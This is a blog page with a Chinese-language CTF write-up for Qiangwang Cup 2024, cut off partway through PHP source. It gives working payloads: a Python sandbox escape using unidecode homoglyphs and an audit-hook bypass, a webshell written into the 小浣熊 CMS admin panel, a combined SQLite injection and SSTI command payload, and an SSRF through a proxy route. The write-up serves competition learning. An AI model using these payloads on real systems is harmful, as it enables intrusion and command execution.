

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/I.png">
  <link rel="icon" href="/img/I.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Infernity">
  <meta name="keywords" content="">
  
    <meta name="description" content="PyBlockly黑名单过滤了所有符号，只能在print里用字母和数字， 1234if check_for_blacklisted_symbols(block[&amp;#x27;fields&amp;#x27;][&amp;#x27;TEXT&amp;#x27;]):    code &#x3D; &amp;#x27;&amp;#x27;else:    code &#x3D; &quot;&amp;#x27;&quot; + unidecode.unidecode(b">
<meta property="og:type" content="article">
<meta property="og:title" content="强网杯2024">
<meta property="og:url" content="http://example.com/2024/11/03/%E5%BC%BA%E7%BD%91%E6%9D%AF2024/index.html">
<meta property="og:site_name" content="Infernity&#39;s Blog">
<meta property="og:description" content="PyBlockly黑名单过滤了所有符号，只能在print里用字母和数字， 1234if check_for_blacklisted_symbols(block[&amp;#x27;fields&amp;#x27;][&amp;#x27;TEXT&amp;#x27;]):    code &#x3D; &amp;#x27;&amp;#x27;else:    code &#x3D; &quot;&amp;#x27;&quot; + unidecode.unidecode(b">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/qwb2024/qwb2024.png">
<meta property="article:published_time" content="2024-11-03T08:40:19.000Z">
<meta property="article:modified_time" content="2025-01-20T02:37:27.773Z">
<meta property="article:author" content="Infernity">
<meta property="article:tag" content="WPs">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/qwb2024/qwb2024.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>强网杯2024 - Infernity&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":150,"cursorChar":"_","loop":true,"scope":["home"]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":"§"},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Infernity&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/friends/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>friends</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/background/19.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle">强网杯2024</span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-11-03 16:40" pubdate>
          2024年11月3日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2.6k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          22 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">强网杯2024</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="PyBlockly"><a href="#PyBlockly" class="headerlink" title="PyBlockly"></a>PyBlockly</h1><p>黑名单过滤了所有符号，只能在print里用字母和数字，</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">if</span> check_for_blacklisted_symbols(block[<span class="hljs-string">&#x27;fields&#x27;</span>][<span class="hljs-string">&#x27;TEXT&#x27;</span>]):<br>    code = <span class="hljs-string">&#x27;&#x27;</span><br><span class="hljs-keyword">else</span>:<br>    code = <span class="hljs-string">&quot;&#x27;&quot;</span> + unidecode.unidecode(block[<span class="hljs-string">&#x27;fields&#x27;</span>][<span class="hljs-string">&#x27;TEXT&#x27;</span>]) + <span class="hljs-string">&quot;&#x27;&quot;</span><br></code></pre></td></tr></table></figure>

<p>但是由于unidecode函数，能够将 Unicode 字符转换为<strong>最相似的 ASCII 字符</strong>。</p>
<p>这里是先检测黑名单，再转化，那么我们可以找到与我们需要的字符最相似的字符，就可以绕过过滤，然后经过unidecode函数转化，就变成我们想要的ascii字符了。</p>
<p>然后由于这里是拼接字符串，我们可以逃逸出去执行任意python代码。</p>
<p>举个栗子：我传入<code>a&#39;)\nprint(&quot;Infernity&quot;)#</code>，经过拼接之后就变成了：</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs stylus"><span class="hljs-function"><span class="hljs-title">print</span><span class="hljs-params">(<span class="hljs-string">&#x27;a&#x27;</span>)</span></span><br><span class="hljs-function"><span class="hljs-title">print</span><span class="hljs-params">(<span class="hljs-string">&quot;Infernity&quot;</span>)</span></span>#<span class="hljs-string">&#x27;)</span><br></code></pre></td></tr></table></figure>

<p>就会回显<code>a</code>和<code>Infernity</code>。我们再把特殊字符找到它最相似的字符：比如<code>(</code>换成<code>⁽</code>，<code>#</code>换成<code>﹟</code>。</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs css"><span class="hljs-selector-tag">a</span>＇⁾\nprint⁽＂Infernity＂⁾﹟<br></code></pre></td></tr></table></figure>

<p><img src="/img/qwb2024/image-20241102125723325.png" srcset="/img/loading.gif" lazyload alt="image-20241102125723325"></p>
<p>方便后续转换，这里贴一个脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python">text = <span class="hljs-string">&quot;&quot;</span><br><br><span class="hljs-built_in">print</span>(text.replace(<span class="hljs-string">&#x27;_&#x27;</span>,<span class="hljs-string">&#x27;＿&#x27;</span>).replace(<span class="hljs-string">&#x27;(&#x27;</span>,<span class="hljs-string">&#x27;⁽&#x27;</span>).replace(<span class="hljs-string">&#x27;)&#x27;</span>,<span class="hljs-string">&#x27;⁾&#x27;</span>).replace(<span class="hljs-string">&#x27;\&#x27;&#x27;</span>,<span class="hljs-string">&#x27;＇&#x27;</span>).replace(<span class="hljs-string">&#x27;#&#x27;</span>,<span class="hljs-string">&#x27;﹟&#x27;</span>).replace(<span class="hljs-string">&#x27;[&#x27;</span>,<span class="hljs-string">&#x27;［&#x27;</span>).replace(<span class="hljs-string">&#x27;]&#x27;</span>,<span class="hljs-string">&#x27;］&#x27;</span>).replace(<span class="hljs-string">&#x27;=&#x27;</span>,<span class="hljs-string">&#x27;⁼&#x27;</span>).replace(<span class="hljs-string">&#x27;&quot;&#x27;</span>,<span class="hljs-string">&#x27;＂&#x27;</span>).replace(<span class="hljs-string">&#x27;.&#x27;</span>,<span class="hljs-string">&#x27;․&#x27;</span>).replace(<span class="hljs-string">&#x27;:&#x27;</span>,<span class="hljs-string">&#x27;：&#x27;</span>).replace(<span class="hljs-string">&#x27;/&#x27;</span>,<span class="hljs-string">&#x27;／&#x27;</span>).replace(<span class="hljs-string">&#x27;-&#x27;</span>,<span class="hljs-string">&#x27;－&#x27;</span>).replace(<span class="hljs-string">&#x27;&gt;&#x27;</span>,<span class="hljs-string">&#x27;﹥&#x27;</span>))<br></code></pre></td></tr></table></figure>

<p>现在绕过第一步了，第二步到了要rce的地方</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">def</span> <span class="hljs-title function_">my_audit_hook</span>(<span class="hljs-params">event_name, arg</span>):<br>    blacklist = [<span class="hljs-string">&quot;popen&quot;</span>, <span class="hljs-string">&quot;input&quot;</span>, <span class="hljs-string">&quot;eval&quot;</span>, <span class="hljs-string">&quot;exec&quot;</span>, <span class="hljs-string">&quot;compile&quot;</span>, <span class="hljs-string">&quot;memoryview&quot;</span>]<br>    <span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(event_name) &gt; <span class="hljs-number">4</span>:<br>        <span class="hljs-keyword">raise</span> RuntimeError(<span class="hljs-string">&quot;Too Long!&quot;</span>)<br>    <span class="hljs-keyword">for</span> bad <span class="hljs-keyword">in</span> blacklist:<br>        <span class="hljs-keyword">if</span> bad <span class="hljs-keyword">in</span> event_name:<br>            <span class="hljs-keyword">raise</span> RuntimeError(<span class="hljs-string">&quot;No!&quot;</span>)<br><br><br><span class="hljs-built_in">__import__</span>(<span class="hljs-string">&#x27;sys&#x27;</span>).addaudithook(my_audit_hook)<br></code></pre></td></tr></table></figure>

<p>我们传入的东西都会进这个hook，AST 沙箱会将用户的输入转化为操作码，此时字符串层面的变换基本上没用了。但是这里没有过滤os和system，所以我们可以直接<code>__import__(&quot;os&quot;).system(&quot;whoami&quot;)</code></p>
<p>但是len(event_name)有限制，会检测os.system，我们的长度肯定是超过了的。</p>
<p>但是我们可以通过覆盖len函数，来绕过长度限制：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">__builtins__.<span class="hljs-built_in">len</span> = <span class="hljs-keyword">lambda</span> x:<span class="hljs-number">1</span><br></code></pre></td></tr></table></figure>

<p>然后直接rce了（直接import可能会有问题，但是我本地可以，远程可以用继承链打。）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">a＇⁾\n＿＿builtins＿＿․<span class="hljs-built_in">len</span> ⁼ <span class="hljs-keyword">lambda</span> x：<span class="hljs-number">1</span>\n＿＿<span class="hljs-keyword">import</span>＿＿⁽＇os＇⁾․system⁽＇whoami＇⁾﹟<br></code></pre></td></tr></table></figure>

<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs angelscript">a＇⁾＃\n＿＿builtins＿＿․len ⁼ lambda x：<span class="hljs-number">1</span>\n\n［ x․＿＿init＿＿․＿＿globals＿＿ <span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> ＇＇․＿＿<span class="hljs-keyword">class</span>＿＿․＿＿<span class="hljs-symbol">base</span>＿＿․＿＿<span class="hljs-symbol">subclasses</span>＿＿⁽⁾ <span class="hljs-symbol">if</span> <span class="hljs-symbol">x</span>․＿＿<span class="hljs-symbol">name</span>＿＿⁼⁼＂＿<span class="hljs-symbol">wrap</span>＿<span class="hljs-symbol">close</span>＂］［<span class="hljs-symbol">0</span>］［＂<span class="hljs-symbol">system</span>＂］⁽＂<span class="hljs-symbol">ls</span> ／－<span class="hljs-symbol">al</span>＂⁾＃<br></code></pre></td></tr></table></figure>

<p><img src="/img/qwb2024/b017e470-feda-4a53-96d2-90a7133a1505.png" srcset="/img/loading.gif" lazyload alt="b017e470-feda-4a53-96d2-90a7133a1505"></p>
<p>需要提权</p>
<p><img src="/img/qwb2024/cd60b7cd-e902-477d-ab12-d4fe477b4460.png" srcset="/img/loading.gif" lazyload alt="cd60b7cd-e902-477d-ab12-d4fe477b4460"></p>
<p>参考gtfobins： <a target="_blank" rel="noopener" href="https://r0yanx.com/gtfobins/dd/">https://r0yanx.com/gtfobins/dd/</a></p>
<p><img src="/img/qwb2024/f1abf556-2db2-48f5-9881-8557a07d55a7.png" srcset="/img/loading.gif" lazyload alt="f1abf556-2db2-48f5-9881-8557a07d55a7"></p>
<h1 id="xiaohuanxiong"><a href="#xiaohuanxiong" class="headerlink" title="xiaohuanxiong"></a>xiaohuanxiong</h1><p>废话1：</p>
<p>&#x2F;search?keyword&#x3D;1 这里sqlmap可以嗦数据库所有内容，但是admin的密码是加盐的md5，无法爆破。</p>
<p>废话2：拿到小浣熊CMS源码，全局搜admin</p>
<p><img src="/img/qwb2024/image-20241102175555820.png" srcset="/img/loading.gif" lazyload alt="image-20241102175555820"></p>
<p>在admin的登录逻辑，是设置了session为{“xwx_admin”:username}，可爱捏，但是很煞笔捏，哪有网站明文session啊？</p>
<p>所以我们注册一个账号，手动添加cookie：xwx_admin:Infernity</p>
<p>然后进去&#x2F;admin&#x2F;admins就可以到后台页面了。</p>
<h2 id="正文："><a href="#正文：" class="headerlink" title="正文："></a>正文：</h2><p>上面全是错的，根本不需要登录，也不需要cookie，直接就可以他妈的进后台管理页面。</p>
<p>然后进入&#x2F;admin&#x2F;payment&#x2F;index页面，这里有file_put_contens函数，可以写马进去，这个payment.php会在各个地方都有包含，写个马进去随便找个地方就可以rce了。</p>
<p><img src="/img/qwb2024/image-20241102180328083.png" srcset="/img/loading.gif" lazyload alt="image-20241102180328083"></p>
<p><img src="/img/qwb2024/463bfe36-1624-4920-9010-18dca2a664c1.png" srcset="/img/loading.gif" lazyload alt="463bfe36-1624-4920-9010-18dca2a664c1"></p>
<p><img src="/img/qwb2024/66a4ccf3-2497-4c28-a5d6-d12796834f95.png" srcset="/img/loading.gif" lazyload alt="66a4ccf3-2497-4c28-a5d6-d12796834f95"></p>
<h1 id="snake"><a href="#snake" class="headerlink" title="snake"></a>snake</h1><p>把每次行动延时改为0.4秒，手打50分就通关了。（打了四遍QAQ）</p>
<p>setInterval(update, 400);</p>
<p>胜利页面：<code>/snake_win?username=admin</code>可以xss没啥用</p>
<p>经过测试发现可以sql注入，数据库是sqllite的：</p>
<figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ada">/snake_win?username=a<span class="hljs-symbol">&#x27;union</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,sqlite_version()<span class="hljs-comment">--</span><br></code></pre></td></tr></table></figure>

<p>后面查表查数据没找到任何有用的东西，最后发现是结合了ssti。&#x3D;-&#x3D;</p>
<figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ada">a<span class="hljs-symbol">&#x27;union</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,(<span class="hljs-keyword">select</span> <span class="hljs-string">&quot;&#123;&#123;7*7&#125;&#125;&quot;</span>) <span class="hljs-comment">--</span><br></code></pre></td></tr></table></figure>

<p><img src="/img/qwb2024/42945632-6661-4760-b130-3559fd11e990.png" srcset="/img/loading.gif" lazyload alt="42945632-6661-4760-b130-3559fd11e990"></p>
<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="language-xml">a&#x27;union select 1,2,(select &quot;</span><span class="hljs-template-variable">&#123;&#123;()<span class="hljs-name">.__class__.__base__.__subclasses__</span>()[117].__init__.__globals__[&#x27;popen&#x27;](<span class="hljs-name">&#x27;cat /f*&#x27;</span>).read()&#125;&#125;</span><span class="language-xml">&quot;)--</span><br></code></pre></td></tr></table></figure>

<p><img src="/img/qwb2024/a2e4f41f-7361-42a5-a884-4ad919838dc0.png" srcset="/img/loading.gif" lazyload alt="a2e4f41f-7361-42a5-a884-4ad919838dc0"></p>
<p>有点脑洞了。</p>
<h1 id="Proxy"><a href="#Proxy" class="headerlink" title="Proxy"></a>Proxy</h1><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br></pre></td><td class="code"><pre><code class="hljs go"><span class="hljs-function"><span class="hljs-keyword">func</span> <span class="hljs-title">main</span><span class="hljs-params">()</span></span> &#123;<br>	r := gin.Default()<br><br>	v1 := r.Group(<span class="hljs-string">&quot;/v1&quot;</span>)<br>	&#123;<br>		v1.POST(<span class="hljs-string">&quot;/api/flag&quot;</span>, <span class="hljs-function"><span class="hljs-keyword">func</span><span class="hljs-params">(c *gin.Context)</span></span> &#123;<br>			cmd := exec.Command(<span class="hljs-string">&quot;/readflag&quot;</span>)<br>			flag, err := cmd.CombinedOutput()<br>			<span class="hljs-keyword">if</span> err != <span class="hljs-literal">nil</span> &#123;<br>				c.JSON(http.StatusInternalServerError, gin.H&#123;<span class="hljs-string">&quot;status&quot;</span>: <span class="hljs-string">&quot;error&quot;</span>, <span class="hljs-string">&quot;message&quot;</span>: <span class="hljs-string">&quot;Internal Server Error&quot;</span>&#125;)<br>				<span class="hljs-keyword">return</span><br>			&#125;<br>			c.JSON(http.StatusOK, gin.H&#123;<span class="hljs-string">&quot;flag&quot;</span>: flag&#125;)<br>		&#125;)<br>	&#125;<br><br>	v2 := r.Group(<span class="hljs-string">&quot;/v2&quot;</span>)<br>	&#123;<br>		v2.POST(<span class="hljs-string">&quot;/api/proxy&quot;</span>, <span class="hljs-function"><span class="hljs-keyword">func</span><span class="hljs-params">(c *gin.Context)</span></span> &#123;<br>			<span class="hljs-keyword">var</span> proxyRequest ProxyRequest<br>			<span class="hljs-keyword">if</span> err := c.ShouldBindJSON(&amp;proxyRequest); err != <span class="hljs-literal">nil</span> &#123;<br>				c.JSON(http.StatusBadRequest, gin.H&#123;<span class="hljs-string">&quot;status&quot;</span>: <span class="hljs-string">&quot;error&quot;</span>, <span class="hljs-string">&quot;message&quot;</span>: <span class="hljs-string">&quot;Invalid request&quot;</span>&#125;)<br>				<span class="hljs-keyword">return</span><br>			&#125;<br><br>			client := &amp;http.Client&#123;<br>				CheckRedirect: <span class="hljs-function"><span class="hljs-keyword">func</span><span class="hljs-params">(req *http.Request, via []*http.Request)</span></span> <span class="hljs-type">error</span> &#123;<br>					<span class="hljs-keyword">if</span> !req.URL.IsAbs() &#123;<br>						<span class="hljs-keyword">return</span> http.ErrUseLastResponse<br>					&#125;<br><br>					<span class="hljs-keyword">if</span> !proxyRequest.FollowRedirects &#123;<br>						<span class="hljs-keyword">return</span> http.ErrUseLastResponse<br>					&#125;<br><br>					<span class="hljs-keyword">return</span> <span class="hljs-literal">nil</span><br>				&#125;,<br>			&#125;<br><br>			req, err := http.NewRequest(proxyRequest.Method, proxyRequest.URL, bytes.NewReader([]<span class="hljs-type">byte</span>(proxyRequest.Body)))<br>			<span class="hljs-keyword">if</span> err != <span class="hljs-literal">nil</span> &#123;<br>				c.JSON(http.StatusInternalServerError, gin.H&#123;<span class="hljs-string">&quot;status&quot;</span>: <span class="hljs-string">&quot;error&quot;</span>, <span class="hljs-string">&quot;message&quot;</span>: <span class="hljs-string">&quot;Internal Server Error&quot;</span>&#125;)<br>				<span class="hljs-keyword">return</span><br>			&#125;<br><br>			<span class="hljs-keyword">for</span> key, value := <span class="hljs-keyword">range</span> proxyRequest.Headers &#123;<br>				req.Header.Set(key, value)<br>			&#125;<br><br>			resp, err := client.Do(req)<br><br>			<span class="hljs-keyword">if</span> err != <span class="hljs-literal">nil</span> &#123;<br>				c.JSON(http.StatusInternalServerError, gin.H&#123;<span class="hljs-string">&quot;status&quot;</span>: <span class="hljs-string">&quot;error&quot;</span>, <span class="hljs-string">&quot;message&quot;</span>: <span class="hljs-string">&quot;Internal Server Error&quot;</span>&#125;)<br>				<span class="hljs-keyword">return</span><br>			&#125;<br><br>			<span class="hljs-keyword">defer</span> resp.Body.Close()<br><br>			body, err := io.ReadAll(resp.Body)<br>			<span class="hljs-keyword">if</span> err != <span class="hljs-literal">nil</span> &#123;<br>				c.JSON(http.StatusInternalServerError, gin.H&#123;<span class="hljs-string">&quot;status&quot;</span>: <span class="hljs-string">&quot;error&quot;</span>, <span class="hljs-string">&quot;message&quot;</span>: <span class="hljs-string">&quot;Internal Server Error&quot;</span>&#125;)<br>				<span class="hljs-keyword">return</span><br>			&#125;<br><br>			c.Status(resp.StatusCode)<br>			<span class="hljs-keyword">for</span> key, value := <span class="hljs-keyword">range</span> resp.Header &#123;<br>				c.Header(key, value[<span class="hljs-number">0</span>])<br>			&#125;<br><br>			c.Writer.Write(body)<br>			c.Abort()<br>		&#125;)<br>	&#125;<br><br>	r.Run(<span class="hljs-string">&quot;127.0.0.1:8769&quot;</span>)<br>&#125;<br></code></pre></td></tr></table></figure>

<p>获取flag的路由在<code>/v1/api/readflag</code></p>
<p>但是nginx限制了<code>/v1</code>路由的访问</p>
<p><img src="/img/qwb2024/7b01c938-7b34-4e02-b3c9-606952c15ec3.png" srcset="/img/loading.gif" lazyload alt="7b01c938-7b34-4e02-b3c9-606952c15ec3"></p>
<p>但是<code>/v2/api/proxy</code>这个路由可以构造一个url请求，绕过中间件去访问<code>/v1/api/readflag</code>：</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus">req, err := http<span class="hljs-selector-class">.NewRequest</span>(proxyRequest<span class="hljs-selector-class">.Method</span>, proxyRequest<span class="hljs-selector-class">.URL</span>, bytes<span class="hljs-selector-class">.NewReader</span>(<span class="hljs-selector-attr">[]</span><span class="hljs-built_in">byte</span>(proxyRequest.Body)))<br></code></pre></td></tr></table></figure>

<p>所以只需要v2 发一个post请求过去就行：</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;URL&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;http://127.0.0.1:8769/v1/api/flag&quot;</span><span class="hljs-punctuation">,</span><span class="hljs-attr">&quot;Method&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;POST&quot;</span><span class="hljs-punctuation">,</span><span class="hljs-attr">&quot;Body&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;&quot;</span><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<img src="/img/qwb2024/image-20241103135058428.png" srcset="/img/loading.gif" lazyload alt="image-20241103135058428" style="zoom:67%;" />

<p>flag{a156a702-6a71-4ebe-83bf-8cb7492c913f}</p>
<h1 id="Password-Game"><a href="#Password-Game" class="headerlink" title="Password Game"></a>Password Game</h1><p>他会要求你的密码满足以下几个条件：</p>
<ol>
<li>至少包含数字和大小写字母</li>
<li>密码中所有数字之和必须为xx的倍数</li>
<li>请密码中包含下列算式的解(如有除法，则为整除): xxxx &#x2F; xxx</li>
</ol>
<p>密码都满足后，会给一个源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><code class="hljs php"><span 